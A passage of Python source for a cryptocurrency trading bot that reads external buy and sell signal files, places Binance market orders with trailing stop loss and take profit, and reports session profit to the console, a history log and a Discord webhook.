                (len(coins_bought) + len(volatile_coins)) < TRADE_SLOTS:
            #(len(coins_bought) + exnumber + len(volatile_coins)) < TRADE_SLOTS:
            volatile_coins[excoin] = 1
            exnumber +=1
            print(f"External signal received on {excoin}, purchasing ${TRADE_TOTAL} {PAIR_WITH} value of {excoin}!")
    balance_report(last_price)
    return volatile_coins, len(volatile_coins), historical_prices[hsp_head]
def buy_external_signals():
    """Collect buy signals dropped by external signal modules.

    Each ``signals/*.buy`` file contains one symbol per line. Every file is
    consumed (read, then deleted) and the symbols are returned as a dict
    keyed by symbol (value == key, matching the original format).
    """
    external_list = {}
    # check directory and load pairs from files into external_list
    for filename in glob.glob("signals/*.buy"):
        # Bug fix: the original iterated open(filename) without closing it;
        # the leaked handle made the os.remove() below fail on Windows.
        with open(filename) as signal_file:
            for line in signal_file:
                symbol = line.strip()
                external_list[symbol] = symbol
        try:
            os.remove(filename)
        except OSError:  # bug fix: was a bare except that hid real errors
            if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file{txcolors.DEFAULT}')
    return external_list
def sell_external_signals():
    """Collect sell signals dropped by external signal modules.

    Each ``signals/*.sell`` file contains one symbol per line. Every file is
    consumed (read, then deleted) and the symbols are returned as a dict
    keyed by symbol (value == key, matching the original format).
    """
    external_list = {}
    # check directory and load pairs from files into external_list
    for filename in glob.glob("signals/*.sell"):
        # Bug fix: the original iterated open(filename) without closing it;
        # the leaked handle made the os.remove() below fail on Windows.
        with open(filename) as signal_file:
            for line in signal_file:
                symbol = line.strip()
                external_list[symbol] = symbol
                if DEBUG: print(f'{symbol} added to sell_external_signals() list')
        try:
            os.remove(filename)
        except OSError:  # bug fix: was a bare except that hid real errors
            if DEBUG: print(f'{txcolors.WARNING}Could not remove external SELL signalling file{txcolors.DEFAULT}')
    return external_list
def balance_report(last_price):
    """Print the session/all-time performance report to the console and push
    a compact one-line summary to Discord and the history log.

    Args:
        last_price: dict keyed by symbol; only last_price[coin]['price'] is
            read here.

    Returns:
        str: the compact summary line that was sent to Discord.
    """
    global trade_wins, trade_losses, session_profit_incfees_perc, session_profit_incfees_total
    unrealised_session_profit_incfees_perc = 0
    unrealised_session_profit_incfees_total = 0
    # session budget = every trade slot fully invested
    BUDGET = TRADE_SLOTS * TRADE_TOTAL
    exposure_calcuated = 0
    # accumulate unrealised profit (including buy+sell fees) over held coins
    for coin in list(coins_bought):
        LastPrice = float(last_price[coin]['price'])
        sellFee = (LastPrice * (TRADING_FEE/100))
        BuyPrice = float(coins_bought[coin]['bought_at'])
        buyFee = (BuyPrice * (TRADING_FEE/100))
        exposure_calcuated = exposure_calcuated + round(float(coins_bought[coin]['bought_at']) * float(coins_bought[coin]['volume']),0)
        #PriceChangeIncFees_Total = float(((LastPrice+sellFee) - (BuyPrice+buyFee)) * coins_bought[coin]['volume'])
        # proceeds net of sell fee minus cost including buy fee
        PriceChangeIncFees_Total = float(((LastPrice-sellFee) - (BuyPrice+buyFee)) * coins_bought[coin]['volume'])
        # unrealised_session_profit_incfees_perc = float(unrealised_session_profit_incfees_perc + PriceChangeIncFees_Perc)
        unrealised_session_profit_incfees_total = float(unrealised_session_profit_incfees_total + PriceChangeIncFees_Total)
    unrealised_session_profit_incfees_perc = (unrealised_session_profit_incfees_total / BUDGET) * 100
    DECIMALS = int(decimals())
    # CURRENT_EXPOSURE = round((TRADE_TOTAL * len(coins_bought)), DECIMALS)
    CURRENT_EXPOSURE = round(exposure_calcuated, 0)
    INVESTMENT_TOTAL = round((TRADE_TOTAL * TRADE_SLOTS), DECIMALS)
    # truncating some of the above values to the correct decimal places before printing
    WIN_LOSS_PERCENT = 0
    if (trade_wins > 0) and (trade_losses > 0):
        WIN_LOSS_PERCENT = round((trade_wins / (trade_wins+trade_losses)) * 100, 2)
    if (trade_wins > 0) and (trade_losses == 0):
        WIN_LOSS_PERCENT = 100
    # benchmark: market movement since the bot started (labelled BTCUSDT below)
    market_profit = ((market_currprice - market_startprice)/ market_startprice) * 100
    mode = "Live (REAL MONEY)"
    discord_mode = "Live"
    if TEST_MODE:
        mode = "Test (no real money used)"
        discord_mode = "Test"
    font = f'{txcolors.ENDC}{txcolors.YELLOW}{txcolors.BOLD}{txcolors.UNDERLINE}'
    # build a comma-separated list of the running external signal modules
    extsigs = ""
    try:
        for module in SIGNALLING_MODULES:
            if extsigs == "":
                extsigs = module
            else:
                extsigs = extsigs + ', ' + module
    except Exception as e:
        # SIGNALLING_MODULES may be None/undefined when no modules are configured
        pass
    if extsigs == "":
        extsigs = "No external signals running"
    print(f'')
    print(f'--------')
    print(f"STARTED : {str(bot_started_datetime).split('.')[0]} | Running for: {str(datetime.now() - bot_started_datetime).split('.')[0]}")
    print(f'CURRENT HOLDS : {len(coins_bought)}/{TRADE_SLOTS} ({float(CURRENT_EXPOSURE):g}/{float(INVESTMENT_TOTAL):g} {PAIR_WITH})')
    if REINVEST_PROFITS:
        print(f'ADJ TRADE TOTAL : {TRADE_TOTAL:.2f} (Current TRADE TOTAL adjusted to reinvest profits)')
    print(f'BUYING MODE : {font if mode == "Live (REAL MONEY)" else txcolors.DEFAULT}{mode}{txcolors.DEFAULT}{txcolors.ENDC}')
    print(f'Buying Paused : {bot_paused}')
    print(f'')
    print(f'SESSION PROFIT (Inc Fees)')
    print(f'Realised : {txcolors.SELL_PROFIT if session_profit_incfees_perc > 0. else txcolors.SELL_LOSS}{session_profit_incfees_perc:.4f}% Est:${session_profit_incfees_total:.4f} {PAIR_WITH}{txcolors.DEFAULT}')
    print(f'Unrealised : {txcolors.SELL_PROFIT if unrealised_session_profit_incfees_perc > 0. else txcolors.SELL_LOSS}{unrealised_session_profit_incfees_perc:.4f}% Est:${unrealised_session_profit_incfees_total:.4f} {PAIR_WITH}{txcolors.DEFAULT}')
    print(f' Total : {txcolors.SELL_PROFIT if (session_profit_incfees_perc + unrealised_session_profit_incfees_perc) > 0. else txcolors.SELL_LOSS}{session_profit_incfees_perc + unrealised_session_profit_incfees_perc:.4f}% Est:${session_profit_incfees_total+unrealised_session_profit_incfees_total:.4f} {PAIR_WITH}{txcolors.DEFAULT}')
    print(f'')
    print(f'ALL TIME DATA :')
    print(f"Market Profit : {txcolors.SELL_PROFIT if market_profit > 0. else txcolors.SELL_LOSS}{market_profit:.4f}% (BTCUSDT Since STARTED){txcolors.DEFAULT}")
    print(f'Bot Profit : {txcolors.SELL_PROFIT if historic_profit_incfees_perc > 0. else txcolors.SELL_LOSS}{historic_profit_incfees_perc:.4f}% Est:${historic_profit_incfees_total:.4f} {PAIR_WITH}{txcolors.DEFAULT}')
    print(f'Completed Trades: {trade_wins+trade_losses} (Wins:{trade_wins} Losses:{trade_losses})')
    print(f'Win Ratio : {float(WIN_LOSS_PERCENT):g}%')
    print(f'')
    print(f'External Signals: {extsigs}')
    print(f'--------')
    print(f'')
    # compact Discord summary: timestamp + abbreviated stats
    #msg1 = str(bot_started_datetime) + " | " + str(datetime.now() - bot_started_datetime)
    msg1 = str(datetime.now()).split('.')[0]
    msg2 = " | " + str(len(coins_bought)) + "/" + str(TRADE_SLOTS) + " | PBOT: " + str(bot_paused) + " | MODE: " + str(discord_mode)
    msg2 = msg2 + ' SPR%: ' + str(round(session_profit_incfees_perc,2)) + ' SPR$: ' + str(round(session_profit_incfees_total,4))
    msg2 = msg2 + ' SPU%: ' + str(round(unrealised_session_profit_incfees_perc,2)) + ' SPU$: ' + str(round(unrealised_session_profit_incfees_total,4))
    msg2 = msg2 + ' SPT%: ' + str(round(session_profit_incfees_perc + unrealised_session_profit_incfees_perc,2)) + ' SPT$: ' + str(round(session_profit_incfees_total+unrealised_session_profit_incfees_total,4))
    msg2 = msg2 + ' ATP%: ' + str(round(historic_profit_incfees_perc,2)) + ' ATP$: ' + str(round(historic_profit_incfees_total,4))
    msg2 = msg2 + ' CTT: ' + str(trade_wins+trade_losses) + ' CTW: ' + str(trade_wins) + ' CTL: ' + str(trade_losses) + ' CTWR%: ' + str(round(WIN_LOSS_PERCENT,2))
    msg_discord_balance(msg1, msg2)
    history_log(session_profit_incfees_perc, session_profit_incfees_total, unrealised_session_profit_incfees_perc, unrealised_session_profit_incfees_total, session_profit_incfees_perc + unrealised_session_profit_incfees_perc, session_profit_incfees_total+unrealised_session_profit_incfees_total, historic_profit_incfees_perc, historic_profit_incfees_total, trade_wins+trade_losses, trade_wins, trade_losses, WIN_LOSS_PERCENT)
    return msg1 + msg2
def history_log(sess_profit_perc, sess_profit, sess_profit_perc_unreal, sess_profit_unreal, sess_profit_perc_total, sess_profit_total, alltime_profit_perc, alltime_profit, total_trades, won_trades, lost_trades, winloss_ratio):
    """Append a snapshot of session/all-time performance to HISTORY_LOG_FILE.

    Throttled to at most one entry per 60 seconds. Writes a tab-separated
    header row the first time the file is created.
    """
    global last_history_log_date
    time_between_insertion = datetime.now() - last_history_log_date
    # only log balance to log file once every 60 seconds.
    # total_seconds() instead of .seconds: timedelta.seconds wraps every 24h,
    # which would suppress logging after a gap of a day or more
    if time_between_insertion.total_seconds() > 60:
        last_history_log_date = datetime.now()
        timestamp = datetime.now().strftime("%y-%m-%d %H:%M:%S")
        # single open: write the header (if new) and the row in one pass
        write_header = not os.path.exists(HISTORY_LOG_FILE)
        with open(HISTORY_LOG_FILE,'a+') as f:
            if write_header:
                f.write('Datetime\tCoins Holding\tTrade Slots\tPausebot Active\tSession Profit %\tSession Profit $\tSession Profit Unrealised %\tSession Profit Unrealised $\tSession Profit Total %\tSession Profit Total $\tAll Time Profit %\tAll Time Profit $\tTotal Trades\tWon Trades\tLost Trades\tWin Loss Ratio\n')
            f.write(f'{timestamp}\t{len(coins_bought)}\t{TRADE_SLOTS}\t{str(bot_paused)}\t{str(round(sess_profit_perc,2))}\t{str(round(sess_profit,4))}\t{str(round(sess_profit_perc_unreal,2))}\t{str(round(sess_profit_unreal,4))}\t{str(round(sess_profit_perc_total,2))}\t{str(round(sess_profit_total,4))}\t{str(round(alltime_profit_perc,2))}\t{str(round(alltime_profit,4))}\t{str(total_trades)}\t{str(won_trades)}\t{str(lost_trades)}\t{str(winloss_ratio)}\n')
def msg_discord_balance(msg1, msg2):
    """Send the balance summary to Discord, at most once every 60 seconds.

    Sends the full message only when the stats portion (msg2) changed since
    the last send; otherwise sends "." as a keep-alive ping.

    Args:
        msg1: timestamp prefix (changes every call, so excluded from the
            change comparison).
        msg2: the stats portion that is compared against the last sent value.
    """
    global last_msg_discord_balance_date, discord_msg_balance_data
    time_between_insertion = datetime.now() - last_msg_discord_balance_date
    # only put the balance message to discord once every 60 seconds and if the balance information has changed since last times
    # NOTE(review): .seconds wraps every 24h, so a gap of exactly N days
    # + <60s would skip one send — presumably acceptable; confirm
    if time_between_insertion.seconds > 60:
        if msg2 != discord_msg_balance_data:
            msg_discord(msg1 + msg2)
            discord_msg_balance_data = msg2
        else:
            # ping msg to know the bot is still running
            msg_discord(".")
def msg_discord(msg):
    """Post *msg* to the configured Discord webhook; no-op when MSG_DISCORD is off."""
    payload_text = msg + '\n\n'
    if not MSG_DISCORD:
        return
    # webhook endpoint: channel settings -> Webhooks -> create webhook
    webhook_url = "https://discordapp.com/api/webhooks/" + DISCORD_WEBHOOK
    # response is intentionally ignored (fire-and-forget)
    requests.post(webhook_url, json={"content": payload_text})
def pause_bot():
    '''Pause the script when external indicators detect a bearish trend in the market.

    An external module signals a pause by creating signals/pausebot.pause;
    while that file exists, buying stops but selling (stop loss / take
    profit) keeps running. The function returns once the file is removed.
    '''
    global bot_paused, session_profit_incfees_perc, hsp_head, session_profit_incfees_total
    # start counting for how long the bot has been paused
    start_time = time.perf_counter()
    while os.path.exists("signals/pausebot.pause"):
        # do NOT accept any external signals to buy while in pausebot mode
        remove_external_signals('buy')
        if bot_paused == False:
            # announce the pause exactly once per pause period
            print(f'{txcolors.WARNING}Buying paused due to negative market conditions, stop loss and take profit will continue to work...{txcolors.DEFAULT}')
            msg = str(datetime.now()) + ' | PAUSEBOT. Buying paused due to negative market conditions, stop loss and take profit will continue to work.'
            msg_discord(msg)
            bot_paused = True
        # Sell function needs to work even while paused
        coins_sold = sell_coins()
        remove_from_portfolio(coins_sold)
        last_price = get_price(True)
        # pausing here
        if hsp_head == 1:
            # print(f'Paused...Session profit: {session_profit_incfees_perc:.2f}% Est: ${session_profit_incfees_total:.{decimals()}f} {PAIR_WITH}')
            balance_report(last_price)
        time.sleep((TIME_DIFFERENCE * 60) / RECHECK_INTERVAL)
    else:
        # while/else: runs when the loop exits normally (pause file removed)
        # stop counting the pause time
        stop_time = time.perf_counter()
        time_elapsed = timedelta(seconds=int(stop_time-start_time))
        # resume the bot and reset bot_paused to False
        if bot_paused == True:
            print(f'{txcolors.WARNING}Resuming buying due to positive market conditions, total sleep time: {time_elapsed}{txcolors.DEFAULT}')
            msg = str(datetime.now()) + ' | PAUSEBOT. Resuming buying due to positive market conditions, total sleep time: ' + str(time_elapsed)
            msg_discord(msg)
            bot_paused = False
    return
def convert_volume():
    '''Converts the volume given in TRADE_TOTAL from USDT to the each coin's volume.

    Returns:
        tuple: (volume, last_price) where volume maps each volatile coin to
        the quantity to buy, rounded to the exchange's lot-size precision.
    '''
    volatile_coins, number_of_coins, last_price = wait_for_price()
    lot_size = {}
    volume = {}
    for coin in volatile_coins:
        # Find the correct step size for each coin
        # max accuracy for BTC for example is 6 decimal points
        # while XRP is only 1
        try:
            info = client.get_symbol_info(coin)
            step_size = info['filters'][2]['stepSize']
            # decimals implied by the step-size string, e.g. '0.00100000'
            # -> index('1') == 4 -> 3 decimal places
            lot_size[coin] = step_size.index('1') - 1
            if lot_size[coin] < 0:
                lot_size[coin] = 0
        except:
            # NOTE(review): bare except leaves the coin out of lot_size so the
            # integer fallback below is used — confirm this is intended
            pass
        # calculate the volume in coin from TRADE_TOTAL in PAIR_WITH (default)
        volume[coin] = float(TRADE_TOTAL / float(last_price[coin]['price']))
        # define the volume with the correct step size
        if coin not in lot_size:
            # original code: volume[coin] = float('{:.1f}'.format(volume[coin]))
            volume[coin] = int(volume[coin])
        else:
            # if lot size has 0 decimal points, make the volume an integer
            if lot_size[coin] == 0:
                volume[coin] = int(volume[coin])
            else:
                #volume[coin] = float('{:.{}f}'.format(volume[coin], lot_size[coin]))
                volume[coin] = truncate(volume[coin], lot_size[coin])
    return volume, last_price
def buy():
    '''Place Buy market orders for each volatile coin found.

    Returns:
        tuple: (orders, last_price, volume) — orders holds the exchange
        order info per purchased coin (a fabricated one-element list in
        TEST_MODE), keyed by symbol.
    '''
    volume, last_price = convert_volume()
    orders = {}
    for coin in volume:
        if coin not in coins_bought:
            print(f"{txcolors.BUY}Preparing to buy {volume[coin]} of {coin} @ ${last_price[coin]['price']}{txcolors.DEFAULT}")
            msg1 = str(datetime.now()) + ' | BUY: ' + coin + '. V:' + str(volume[coin]) + ' P$:' + str(last_price[coin]['price'])
            msg_discord(msg1)
            if TEST_MODE:
                # fabricate an order record; shape mirrors Binance's order list
                orders[coin] = [{
                    'symbol': coin,
                    'orderId': 0,
                    'time': datetime.now().timestamp()
                }]
                # Log trade
                #if LOG_TRADES:
                write_log(f"\tBuy\t{coin}\t{volume[coin]}\t{last_price[coin]['price']}\t{PAIR_WITH}")
                #write_signallsell(coin.removesuffix(PAIR_WITH))
                write_signallsell(rchop(coin, PAIR_WITH))
                continue
            # try to create a real order if the test orders did not raise an exception
            try:
                order_details = client.create_order(
                    symbol = coin,
                    side = 'BUY',
                    type = 'MARKET',
                    quantity = volume[coin]
                )
            # error handling here in case position cannot be placed
            except Exception as e:
                print(f'buy() exception: {e}')
            # run the else block if the position has been placed and return order info
            else:
                orders[coin] = client.get_all_orders(symbol=coin, limit=1)
                # binance sometimes returns an empty list, the code will wait here until binance returns the order
                while orders[coin] == []:
                    print('Binance is being slow in returning the order, calling the API again...')
                    orders[coin] = client.get_all_orders(symbol=coin, limit=1)
                    time.sleep(1)
                else:
                    # while/else: reached once the order list is non-empty
                    print('Order returned, saving order to file')
                if not TEST_MODE:
                    # replace the raw order list with the aggregated fill data
                    orders[coin] = extract_order_data(order_details)
                    write_log(f"\tBuy\t{coin}\t{orders[coin]['volume']}\t{orders[coin]['avgPrice']}\t{PAIR_WITH}")
                else:
                    write_log(f"\tBuy\t{coin}\t{volume[coin]}\t{last_price[coin]['price']}\t{PAIR_WITH}")
                write_signallsell(coin)
        else:
            print(f'Signal detected, but there is already an active trade on {coin}')
    return orders, last_price, volume
def sell_coins(tpsl_override = False, specific_coin_to_sell = ""):
    '''sell coins that have reached the STOP LOSS or TAKE PROFIT threshold.

    Also honours external sell signals, sell-all / sell-specific-coin modes
    and the session TP/SL override. Updates session and all-time profit
    globals for every coin actually sold.

    Args:
        tpsl_override: True when the session-level TP/SL forced this sale.
        specific_coin_to_sell: symbol to sell when sell_specific_coin is set.

    Returns:
        dict: coins sold this pass, keyed by symbol.
    '''
    global hsp_head, session_profit_incfees_perc, session_profit_incfees_total, coin_order_id, trade_wins, trade_losses, historic_profit_incfees_perc, historic_profit_incfees_total, sell_all_coins, sell_specific_coin
    global TRADE_TOTAL
    externals = sell_external_signals()
    last_price = get_price(False) # don't populate rolling window
    #last_price = get_price(add_to_historical=True) # don't populate rolling window
    coins_sold = {}
    BUDGET = TRADE_TOTAL * TRADE_SLOTS
    # table stuff
    my_table = PrettyTable()
    my_table.field_names = ["Symbol", "Volume", "Bought At", "Now At", "TP %", "SL %", "Change %", "Profit $", "Time Held"]
    my_table.align["Symbol"] = "l"
    my_table.align["Volume"] = "r"
    my_table.align["Bought At"] = "r"
    my_table.align["Now At"] = "r"
    my_table.align["TP %"] = "r"
    my_table.align["SL %"] = "r"
    my_table.align["Change %"] = "r"
    my_table.align["Profit $"] = "r"
    my_table.align["Time Held"] = "l"
    for coin in list(coins_bought):
        if sell_specific_coin and not specific_coin_to_sell == coin:
            continue
        # timestamp truncated to 10 digits: tolerate both s and ms epoch values
        #time_held = timedelta(seconds=datetime.now().timestamp()-coins_bought[coin]['timestamp'])
        time_held = timedelta(seconds=datetime.now().timestamp()-int(str(coins_bought[coin]['timestamp'])[:10]))
        #if HODLMODE_ENABLED and (time_held >= HODLMODE_TIME_THRESHOLD):
        #    move_coin_to_hodl(coin)
        #    continue
        # per-unit prices adjusted for trading fees on both legs
        LastPrice = float(last_price[coin]['price'])
        sellFee = (LastPrice * (TRADING_FEE/100))
        sellFeeTotal = (coins_bought[coin]['volume'] * LastPrice) * (TRADING_FEE/100)
        LastPriceLessFees = LastPrice - sellFee
        BuyPrice = float(coins_bought[coin]['bought_at'])
        buyFee = (BuyPrice * (TRADING_FEE/100))
        buyFeeTotal = (coins_bought[coin]['volume'] * BuyPrice) * (TRADING_FEE/100)
        BuyPricePlusFees = BuyPrice + buyFee
        ProfitAfterFees = LastPriceLessFees - BuyPricePlusFees
        PriceChange_Perc = float((LastPrice - BuyPrice) / BuyPrice * 100)
        #PriceChangeIncFees_Perc = float(((LastPrice+sellFee) - (BuyPrice+buyFee)) / (BuyPrice+buyFee) * 100)
        PriceChangeIncFees_Perc = float(((LastPriceLessFees - BuyPricePlusFees) / BuyPricePlusFees) * 100)
        #PriceChangeIncFees_Unit = float((LastPrice+sellFee) - (BuyPrice+buyFee))
        PriceChangeIncFees_Unit = float(LastPriceLessFees - BuyPricePlusFees)
        # define stop loss and take profit
        TP = float(coins_bought[coin]['bought_at']) + ((float(coins_bought[coin]['bought_at']) * (coins_bought[coin]['take_profit']) / 100))
        SL = float(coins_bought[coin]['bought_at']) + ((float(coins_bought[coin]['bought_at']) * (coins_bought[coin]['stop_loss']) / 100))
        # check that the price is above the take profit and readjust SL and TP accordingly if trialing stop loss used
        #if LastPrice > TP and USE_TRAILING_STOP_LOSS and not sell_all_coins and not tpsl_override:
        if LastPriceLessFees > TP and USE_TRAILING_STOP_LOSS and not sell_all_coins and not tpsl_override and not sell_specific_coin:
            # increasing TP by TRAILING_TAKE_PROFIT (essentially next time to readjust SL)
            #if PriceChange_Perc >= 0.8:
            if PriceChangeIncFees_Perc >= 0.8:
                # price has changed by 0.8% or greater, a big change. Make the STOP LOSS trail closely to the TAKE PROFIT
                # so you don't lose this increase in price if it falls back
                #coins_bought[coin]['take_profit'] = PriceChange_Perc + TRAILING_TAKE_PROFIT
                coins_bought[coin]['take_profit'] = PriceChangeIncFees_Perc + TRAILING_TAKE_PROFIT
                coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
            else:
                # price has changed by less than 0.8%, a small change. Make the STOP LOSS trail loosely to the TAKE PROFIT
                # so you don't get stopped out of the trade prematurely
                coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
                #coins_bought[coin]['take_profit'] = PriceChange_Perc + TRAILING_TAKE_PROFIT
                coins_bought[coin]['take_profit'] = PriceChangeIncFees_Perc + TRAILING_TAKE_PROFIT
            # we've got a negative stop loss - not good, we don't want this.
            if coins_bought[coin]['stop_loss'] <= 0:
                coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] * .25
            #if DEBUG: print(f"{coin} TP reached, adjusting TP {coins_bought[coin]['take_profit']:.{decimals()}f} and SL {coins_bought[coin]['stop_loss']:.{decimals()}f} accordingly to lock-in profit")
            my_table.add_row([f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coin + ' TP up!'}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coins_bought[coin]['volume']:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{BuyPrice:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{LastPrice:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coins_bought[coin]['take_profit']:.4f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coins_bought[coin]['stop_loss']:.4f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{PriceChangeIncFees_Perc:.4f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{str(time_held).split('.')[0]}{txcolors.DEFAULT}"])
            continue
        # check that the price is below the stop loss or above take profit (if trailing stop loss not used) and sell if this is the case
        sellCoin = False
        sell_reason = ""
        if SELL_ON_SIGNAL_ONLY:
            # only sell if told to by external signal
            if coin in externals:
                sellCoin = True
                sell_reason = 'External Sell Signal'
        else:
            #if LastPrice < SL:
            if LastPriceLessFees < SL:
                sellCoin = True
                if USE_TRAILING_STOP_LOSS:
                    #if PriceChange_Perc >= 0:PriceChangeIncFees_Perc
                    if PriceChangeIncFees_Perc >= 0:
                        sell_reason = "TTP " + str(SL) + " reached"
                    else:
                        sell_reason = "TSL " + str(SL) + " reached"
                else:
                    sell_reason = "SL " + str(SL) + " reached"
                sell_reason = sell_reason
            #if LastPrice > TP:
            if LastPriceLessFees > TP:
                sellCoin = True
                sell_reason = "TP " + str(TP) + " reached"
            if coin in externals:
                sellCoin = True
                sell_reason = 'External Sell Signal'
        if sell_all_coins:
            sellCoin = True
            sell_reason = 'Sell All Coins'
        if sell_specific_coin:
            sellCoin = True
            sell_reason = 'Sell Specific Coin'
        if tpsl_override:
            sellCoin = True
            sell_reason = session_tpsl_override_msg
        if sellCoin:
            print(f"{txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.SELL_LOSS}Sell: {coins_bought[coin]['volume']} of {coin} | {sell_reason} | ${float(LastPrice):g} - ${float(BuyPrice):g} | Profit: {PriceChangeIncFees_Perc:.2f}% Est: {((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100:.{decimals()}f} {PAIR_WITH} (Inc Fees){txcolors.DEFAULT}")
            msg1 = str(datetime.now()) + '| SELL: ' + coin + '. R:' + sell_reason + ' P%:' + str(round(PriceChangeIncFees_Perc,2)) + ' P$:' + str(round(((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100,4))
            msg_discord(msg1)
            # try to create a real order
            try:
                if not TEST_MODE:
                    #lot_size = coins_bought[coin]['step_size']
                    #if lot_size == 0:
                    #    lot_size = 1
                    #lot_size = lot_size.index('1') - 1
                    #if lot_size < 0:
                    #    lot_size = 0
                    order_details = client.create_order(
                        symbol = coin,
                        side = 'SELL',
                        type = 'MARKET',
                        quantity = coins_bought[coin]['volume']
                    )
            # error handling here in case position cannot be placed
            except Exception as e:
                #if repr(e).upper() == "APIERROR(CODE=-1111): PRECISION IS OVER THE MAXIMUM DEFINED FOR THIS ASSET.":
                print(f"sell_coins() Exception occured on selling the coin! Coin: {coin}\nSell Volume coins_bought: {coins_bought[coin]['volume']}\nPrice:{LastPrice}\nException: {e}")
            # run the else block if coin has been sold and create a dict for each coin sold
            else:
                if not TEST_MODE:
                    coins_sold[coin] = extract_order_data(order_details)
                    # replace estimates with the actual fill data from Binance
                    LastPrice = coins_sold[coin]['avgPrice']
                    sellFee = coins_sold[coin]['tradeFeeUnit']
                    coins_sold[coin]['orderid'] = coins_bought[coin]['orderid']
                    priceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
                    # update this from the actual Binance sale information
                    #PriceChangeIncFees_Unit = float((LastPrice+sellFee) - (BuyPrice+buyFee))
                    PriceChangeIncFees_Unit = float((LastPrice-sellFee) - (BuyPrice+buyFee))
                else:
                    coins_sold[coin] = coins_bought[coin]
                # prevent system from buying this coin for the next TIME_DIFFERENCE minutes
                volatility_cooloff[coin] = datetime.now()
                if DEBUG:
                    print(f"sell_coins() | Coin: {coin} | Sell Volume: {coins_bought[coin]['volume']} | Price:{LastPrice}")
                # Log trade
                #BB profit = ((LastPrice - BuyPrice) * coins_sold[coin]['volume']) * (1-(buyFee + sellFeeTotal))
                profit_incfees_total = coins_sold[coin]['volume'] * PriceChangeIncFees_Unit
                #write_log(f"Sell: {coins_sold[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} Profit: {profit_incfees_total:.{decimals()}f} {PAIR_WITH} ({PriceChange_Perc:.2f}%)")
                #write_log(f"\tSell\t{coin}\t{coins_sold[coin]['volume']}\t{BuyPrice}\t{PAIR_WITH}\t{LastPrice}\t{profit_incfees_total:.{decimals()}f}\t{PriceChange_Perc:.2f}\t{sell_reason}")
                write_log(f"\tSell\t{coin}\t{coins_sold[coin]['volume']}\t{BuyPrice}\t{PAIR_WITH}\t{LastPrice}\t{profit_incfees_total:.{decimals()}f}\t{PriceChangeIncFees_Perc:.2f}\t{sell_reason}")
                #reinvest profits
                if REINVEST_PROFITS:
                    # spread realised profit evenly over all trade slots
                    TRADE_TOTAL += (profit_incfees_total / TRADE_SLOTS)
                #this is good
                session_profit_incfees_total = session_profit_incfees_total + profit_incfees_total
                session_profit_incfees_perc = session_profit_incfees_perc + ((profit_incfees_total/BUDGET) * 100)
                historic_profit_incfees_total = historic_profit_incfees_total + profit_incfees_total
                historic_profit_incfees_perc = historic_profit_incfees_perc + ((profit_incfees_total/BUDGET) * 100)
                #TRADE_TOTAL*PriceChangeIncFees_Perc)/100
                #if (LastPrice+sellFee) >= (BuyPrice+buyFee):
                if (LastPrice-sellFee) >= (BuyPrice+buyFee):
                    trade_wins += 1
                else:
                    trade_losses += 1
                update_bot_stats()
                if not sell_all_coins and not sell_specific_coin:
                    # within sell_all_coins, it will print display to screen
                    balance_report(last_price)
                # sometimes get "rate limited" errors from Binance if we try to sell too many coins at once
                # so wait 1 second in between sells
                time.sleep(1)
            continue
        # no action; print once every TIME_DIFFERENCE
        if hsp_head == 1:
            if len(coins_bought) > 0:
                #print(f"Holding: {coins_bought[coin]['volume']} of {coin} | {LastPrice} - {BuyPrice} | Profit: {txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.SELL_LOSS}{PriceChangeIncFees_Perc:.4f}% Est: ({((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100:.{decimals()}f} {PAIR_WITH}){txcolors.DEFAULT}")
